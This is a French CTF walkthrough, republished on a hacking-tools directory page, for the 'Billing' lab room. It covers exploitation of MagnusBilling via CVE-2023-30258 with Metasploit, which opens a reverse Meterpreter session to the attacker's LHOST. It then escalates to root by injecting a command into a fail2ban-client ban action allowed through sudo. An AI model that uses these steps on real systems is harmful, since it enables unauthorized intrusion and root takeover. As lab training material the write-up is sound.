Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Room-Walkthrough-Billing — Un guide détaillé de l'exploitation de Billing room via CVE-2023-30258 et de l'escalade de privilèges via une mauvaise configuration de fail2ban. | Kitploit
Outils/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

Un guide détaillé de l'exploitation de Billing room via CVE-2023-30258 et de l'escalade de privilèges via une mauvaise configuration de fail2ban.

Voir le dépôt
141il y a 1 moisPas encore vérifié

🧠 Procédure pas à pas de la salle : Billing

Écrit par : Aditya Bhatt | Contributeur Open Source


📦 Aperçu

Dans cette procédure, nous attaquons de plein fouet la salle Billing, mettant en avant une instance MagnusBilling vulnérable, une juteuse RCE sans authentification (CVE-2023-30258), et une mauvaise configuration sudo de fail2ban qui crie « root me ».

Cette salle mélange magnifiquement l'exploitation automatisée avec une escalade de privilèges créative, nous offrant un aperçu pratique des failles du monde réel cachées dans les logiciels de facturation VoIP. Nous passerons de la reconnaissance initiale au shell root avec un PoC complet, des commentaires et une ambiance 🗿.


🌐 Étape 1 : Phase d'énumération

🏁 Accès initial

Après avoir déployé la machine, la première chose qui vous frappe comme un pare-feu mal configuré :

root@kitploit:~
http://<IP_machine>/mbilling/

C'est la page de connexion de MagnusBilling. Cela seul déclenche des sonnettes — vous savez que vous allez jouer avec un juteux CVE.

Site


🔍 Reconnaissance approfondie avec Nmap + Gobuster

Nous commençons avec le combo de reconnaissance ultime :

root@kitploit:~
nmap -A -sV -p- 10.10.115.173

🧠 Résultats :

  • Port 5038 – Asterisk Call Manager/2.10.6
  • D'autres services HTTP sont disponibles sous /mbilling/

Ensuite, nous passons en brute force avec Gobuster :

root@kitploit:~
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 Résultats :

  • robots.txt

Robots

🏗️ robots.txt

Ensuite, nous vérifions le robots.txt du site pour voir s'il y a quelque chose d'intéressant :

root@kitploit:~
User-agent: *
Disallow: /mbilling/

Hmm… essayer de le cacher ne fait que nous le faire désirer plus 😈

Robots


🔌 Étape 2 : Exploitation

🔥 Port 5038 – Asterisk Manager

Un test rapide avec netcat confirme qu'il répond avec :

root@kitploit:~
Response: Error
Message: Missing action in request

Ce qui confirme davantage : le backend est MagnusBilling, et le port est lié à Asterisk Call Manager. Il est temps d'invoquer nos arts sombres 🧙

5038


⚔️ Arme de choix : CVE-2023-30258

Exploit : Exécution de code à distance non authentifiée dans MagnusBilling Module : exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Lancez Metasploit :

root@kitploit:~
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

Ensuite, vérifiez les prérequis :

root@kitploit:~
show options

msf_2

Ensuite, configurez ce qui suit :

root@kitploit:~
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

Quelques secondes plus tard… Boom. Nous avons une session Meterpreter !

root@kitploit:~
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

Essayé de lancer un shell TTY :

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 Étape 3 : Énumération des utilisateurs

Nous commençons à remonter avec :

root@kitploit:~
cd ..
cd ..

msf_5_2

Jusqu'à ce que nous trouvions :

root@kitploit:~
cd /home/magnus
cat user.txt

msf_6

Sympa ! Mais nous n'avons pas fini. Il nous faut root, et Magnus nous murmure des secrets.


🧨 Étape 4 : Escalade de privilèges

Vérifions ce que nous pouvons exécuter avec sudo :

root@kitploit:~
sudo -l

Résultat :

root@kitploit:~
(ALL) NOPASSWD: /usr/bin/fail2ban-client

Maintenant, ça c'est 🔥. Nous pouvons abuser de fail2ban-client pour exécuter des commandes en tant que root en utilisant les actions de bannissement.


🎯 Abus de Fail2Ban → Shell root

Redémarrons fail2ban :

root@kitploit:~
sudo /usr/bin/fail2ban-client restart

Ensuite, injectons la commande pour voler le flag root :

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Déclenchez le bannissement (et donc la commande) :

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

Ensuite :

root@kitploit:~
cat /tmp/root.txt

msf_7

Rooté. Comme. Un. Boss. 🗿🔥


✅ Tableau récapitulatif final


🧠 Ce que vous avez appris (alias Sagesse de semi-pro)

  1. 🔍 La reconnaissance ne se limite pas au scan – Cherchez des pages cachées, vérifiez robots.txt et fouillez les ports étranges.
  2. 💣 Exploitez les CVE connus – MagnusBilling était vulnérable à un exploit public (CVE-2023-30258).
  3. 🔓 L'escalade de privilèges ne signifie pas toujours des exploits du noyau – Des droits sudo mal configurés (comme sur fail2ban-client) sont tout aussi dangereux.
  4. ⚙️ La créativité compte – Contourner les restrictions utilisateur avec des actions de bannissement montre une réflexion latérale concrète.

🗿 Derniers mots

Cette machine était un bel équilibre entre exploitation automatisée et créativité manuelle post-exploitation. De la RCE MagnusBilling au rooting via fail2ban, elle touche toutes les bonnes notes pour la playlist d'un pentester 🎧🎯

Que vous soyez un débutant cherchant à monter en niveau ou un guerrier chevronné collectionnant les flags — celle-ci est un must-pwn.

À la prochaine, Restez dangereux. Restez curieux. Restez majestueux. 🗿


Télécharger l’outil
🔎 Stage💥 Action/Tool Used
Accès initialDécouverte du portail /mbilling et du port 5038 avec Nmap + Gobuster
Découverte en reconnaissanceMagnusBilling CMS + Asterisk Call Manager
ExploitationCVE-2023-30258 via Metasploit → shell Meterpreter
ÉnumérationLocalisation de /home/magnus/user.txt
Escalade de privilègesAbus de sudo NOPASSWD sur fail2ban-client → RCE en tant que root
Flag rootRécupération de /root/root.txt via injection de payload fail2ban